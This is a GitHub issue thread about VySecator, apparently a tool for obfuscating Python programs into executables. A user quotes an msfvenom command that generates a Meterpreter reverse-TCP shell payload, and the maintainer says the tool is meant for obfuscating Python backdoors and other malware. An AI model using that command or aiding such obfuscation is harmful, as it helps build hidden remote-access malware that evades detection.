### ISSUE TITLE
obfuscated exe not executing

### ISSUE THREAD

**Issue by impro2612** [Vedant-Bhalgama/VySecator#2]
Hey Vedant,
I created a basic python payload using msfvenom
"msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx > abc.py"
after that I used Vysecator to obfuscate the payload, I used option 3 that is "obfuscate & convert to exe"
after conversion when I execute the obfuscated payload its show an error "Failed to execute script".
can u help & show any workaround here?

**Comment by Vedant-Bhalgama** [comment]
Hey impro!

You cant compile MsfVenom Python Payloads with my tool, I am working on a new Update on which I will add a new option to compile the msfvenom payloads, If you have developed a Backdoor or any other kind of Malware in Python, Then my tool is going to work for it, Not for MsfVenom.

In Short

Just wait for sometime, I will surely bring a Update on MsfVenom Payloads also!

**Comment by Vedant-Bhalgama** [comment]
I also tried the MsfVenom Payload with my tool, But it also wasn't working. So Please be patient, I will bring a Update soon!

**Comment by impro2612** [comment]
Cool... buddy thnx for the info ;)

**Comment by Vedant-Bhalgama** [comment]
Anytime man! But Thanks to you also because you reported a issue which I need to improve!
Please free to ask something to me, If I don't reply in 24 Hours then please contact me at 
`5016.stkabirdio@gmail.com`

Happy Hacking!
